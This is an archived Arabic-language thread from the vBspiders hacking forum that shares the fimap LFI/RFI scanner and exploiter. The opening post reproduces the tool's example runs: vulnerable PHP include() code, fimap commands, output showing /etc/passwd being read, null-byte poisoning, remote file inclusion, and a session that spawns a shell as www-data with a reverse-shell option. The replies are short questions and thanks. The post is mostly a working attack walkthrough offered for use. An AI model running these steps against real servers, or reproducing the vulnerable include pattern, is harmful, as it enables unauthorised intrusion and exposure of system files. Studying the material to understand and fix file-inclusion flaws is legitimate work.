:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Tools forum (http://www.vbspiders.com/vb/f279.html)
-   -   اداة fimap (http://www.vbspiders.com/vb/t58367.html)

JetLi 09-09-2011 06:27 PM
اداة fimap
 
بسم الله الرحمن الرحيم
___________________________

هي اداة موجودة في الباك تراك ولكن على ما اعتقد ان اي اداة مكتوبة بـ python ,perl,php ولا تعتمد على ادوات اخرى او بيئة اخرى يمكنك ان تنزلها في الوندوز او الينكس او اي نظام تشغيل مركب فيه perl ,php,python
نترككم مع استخداماتها وامثلة تركها صاحب الاداة:
Example Runs

Absolute Clean

<?
// Vulerable PHP Code:
include($_GET["inc"]);
?>
  • fimap'ing it:imax@DevelB0x:~$ fimap -u "http://localhost/vulnerable.php?inc=index.php"
    fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
    SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index.php'
    [OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index.php'...
    [INFO] Fiddling around with URL...
    [OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=283wnWJP' with Parameter 'inc'.
    [OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index.php' with Key 'inc'...
    [INFO] Scriptpath received: '/var/www'
    [INFO] Testing file '/etc/passwd'...
    [INFO] Testing file '/proc/self/environ'...
    [INFO] Testing file 'php://input'...
    [INFO] Testing file 'http://www.phpbb.de/index.php'...
    [INFO] Testing file 'http://www.uni-bonn.de/Frauengeschichte/index.html'...
    [INFO] Testing file 'http://www.kah-bonn.de/index.htm?presse/winterthur.htm'...
    ################################################## #################################
    #[1] Possible File Injection #
    ################################################## #################################
    # [URL] http://localhost/vulnerable.php?inc=index.php #
    # [PARAM] inc #
    # [PATH] /var/www #
    # [TYPE] Absolute Clean + Remote injection #
    # [NULLBYTE] No Need. It's clean. #
    # [READABLE FILES] #
    # [0] /etc/passwd #
    # [1] php://input #
    # [2] http://www.phpbb.de/index.php #
    # [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
    # [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
    ################################################## #################################

Absolute with Appendix

<?
// Vulerable PHP Code:
<? include($_GET["inc"] . ".php"); ?>
?>
  • fimap'ing it:imax@DevelB0x:~$ fimap -u "http://localhost/vulnerable.php?inc=index"
    fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
    SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index'
    [OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index'...
    [INFO] Fiddling around with URL...
    [OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=E9Zk658J' with Parameter 'inc'.
    [OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index' with Key 'inc'...
    [INFO] Scriptpath received: '/var/www'
    [INFO] Trying NULL-Byte Poisoning to get rid of the suffix...
    [INFO] NULL-Byte Poisoning successfull!
    [INFO] Testing file '/etc/passwd'...
    [INFO] Testing file '/proc/self/environ'...
    [INFO] Testing file 'php://input'...
    [INFO] Testing file 'http://www.phpbb.de/index.php'...
    [INFO] Testing file 'http://www.uni-bonn.de/Frauengeschichte/index.html'...
    [INFO] Testing file 'www.kah-bonn.de/index.htm?presse/winterthur.htm'...
    ################################################## ################################################## ####################################
    #[1] Possible File Injection #
    ################################################## ################################################## ####################################
    # [URL] http://localhost/vulnerable.php?inc=index #
    # [PARAM] inc #
    # [PATH] /var/www #
    # [TYPE] Absolute with appendix '.php' + Remote injection #
    # [NULLBYTE] Works. :) #
    # [READABLE FILES] #
    # [0] /etc/passwd -> /etc/passwd%00 #
    # [1] php://input -> php://input%00 #
    # [2] http://www.phpbb.de/index.php -> http://www.phpbb.de/index.php%00 #
    # [3] http://www.uni-bonn.de/Frauengeschichte/index.html -> http://www.uni-bonn.de/Frauengeschichte/index.html%00 #
    ################################################## ################################################## ####################################
Relative with Appendix

<?
// Vulerable PHP Code:
include("/var/www/" . $_GET["inc"] . ".php");
?>
  • fimap'ing it...imax@DevelB0x:~$ fimap -u "http://localhost/vulnerable.php?inc=index"
    fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
    SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index'
    [OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index'...
    [INFO] Fiddling around with URL...
    [OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=y3qfVVpx' with Parameter 'inc'.
    [OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index' with Key 'inc'...
    [INFO] Scriptpath received: '/var/www'
    [INFO] Trying NULL-Byte Poisoning to get rid of the suffix...
    [INFO] NULL-Byte Poisoning successfull!
    [INFO] Testing file '/etc/passwd'...
    [INFO] Testing file '/proc/self/environ'...
    [INFO] Skipping absolute file 'php://input'.
    [INFO] Skipping remote file 'http://www.phpbb.de/index.php'.
    [INFO] Skipping remote file 'http://www.uni-bonn.de/Frauengeschichte/index.html'.
    [INFO] Skipping remote file 'www.kah-bonn.de/index.htm?presse/winterthur.htm'.
    ################################################## #############
    #[1] Possible File Injection #
    ################################################## #############
    # [URL] http://localhost/vulnerable.php?inc=index #
    # [PARAM] inc #
    # [PATH] /var/www #
    # [TYPE] Relative with appendix '.php' #
    # [NULLBYTE] Works. :) #
    # [READABLE FILES] #
    # [0] /etc/passwd -> ../../etc/passwd%00 #
    ################################################## #############
Obtaining a Shell

imax@DevelB0x:~$ fimap -x
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
###################
#List of Domains #
###################
#[1] localhost #
###################
Choose Domain: 1
################################################## #########################################
#FI Bugs on localhost #
################################################## #########################################
#[1] URL: '/vulnerable.php?inc=index' injecting file: 'php://input' using param: 'inc' #
################################################## #########################################
Choose vulnerable script: 1
[INFO] Testing code injection thru POST...
[OUT] PHP Injection works! Testing if execution works...
[OUT] Testing execution thru 'popen'...
#################################
#Available Attacks #
#################################
#[1] Spawn Shell #
#[2] Create reverse shell... #
#################################
Choose Attack: 1
-------------------------------------------
Welcome to fimap shell!
Better dont start interactive commands! ;)
Enter 'q' to exit the shell.
-------------------------------------------
fimap_shell$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
fimap_shell$> uname -a
Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
fimap_shell$> q

See ya dude!
imax@DevelB0x:~$
لا تنسو التقييم ،
يمكنك تحميل الاداة من هنا

bleu moon 09-09-2011 06:46 PM
رد: اداة fimap
 
شو عملها ؟

k4$p3r-MA 09-09-2011 08:07 PM
رد: اداة fimap
 
شكراا اخ ايرون مان اداة مهمة في جميع الاستخدامات

cisco_security 09-09-2011 08:22 PM
رد: اداة fimap
 
لم تشرح فيما تستخدم اصلا
ممكن في فحص المواقع على حسب ما فهمته من الامثله !!!!!!

vpn_31 09-10-2011 09:22 AM
رد: اداة fimap
 
لماذا تستخدم لفحص ألمواقع أم لماذا ؟

killua1 08-10-2014 08:30 AM
رد: اداة fimap
 
123:icon30:

max200 09-07-2014 05:24 AM
رد: اداة fimap
 
------************************---------------

مستر عبدالرحيم 03-07-2015 03:45 PM
رد: اداة fimap
 
اداة رائعة


الساعة الآن 12:17 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0